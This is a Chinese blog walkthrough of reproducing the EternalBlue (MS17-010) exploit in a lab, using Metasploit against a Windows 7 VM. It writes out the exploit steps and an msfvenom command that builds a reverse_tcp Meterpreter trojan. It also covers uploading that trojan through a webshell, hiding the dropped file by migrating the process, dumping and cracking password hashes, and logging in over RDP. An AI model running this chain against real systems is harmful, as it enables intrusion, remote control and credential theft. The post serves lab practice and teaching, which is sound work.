聪明的海星

 

基于实验环境的永恒之蓝(MS17-010)漏洞复现实践

我们在上一篇文章用蚁剑连接了win7之后,接下来我们打开kali的终端输入msfconsole
image
显示msf6我就可以接着输入search ms17然后他会显示出工具中所有带有ms17的工具
image
然后我们先输入use 24,使用这个工具来检查win7中是否存在漏洞可以攻击
image
接着我们输入show options看一下工具配置有哪些需要填(注:required为yes就是必须要填的)
image
这里可以看到rhosts是必填但是他现在是空的,所以我们输入set rhosts 靶机ip,填好之后我们可以输入show missing检查所有必填是否填完
image
然后开始运行,这里可以看到靶机是有漏洞可以攻击的
image
然后我们就可以输入use 0利用这个工具进行攻击,使用方法和上面一样先配置再运行,但是这里面修改的LHOST是填我们本机也就是kali的IP地址
image
配置好以后我们run一下出现这个页面就是成功打开了win7的终端
image
然后我们ctrl+shift+T打开一个新的终端输入“msfvenom -p windows/meterpreter/reverse_tcp LHOST=本机ip LPORT=9527 -f exe > info.exe”生成一个木马文件
image
然后我们用蚁剑上传木马文件
image
然后我们就可以设置一个监听模块,在msf6中搜/hand
image
同样use 7,然后开始配置,注意的是这里我们还要改payload(注:这里的LPORT要改为你之前生成木马文件的监听接口9527)
image
我们这时候用蚁剑运行info.exe
image
我们返回kali可以看到出现meterpreter,输入getuid显示如图证明成功
image
然后我们把info.exe的进程改一下
image
这样就能在蚁剑中删除info.exe
我们用hashdump获取密码然后破解密码
image
重新打开一个终端输入rdesktop 192.168.74.130,然后把获得的密码输入就可以远程链接win7虚拟机了
image
image

posted on 2026-06-25 19:54  聪明的海星  阅读(5)  评论(0)    收藏  举报

导航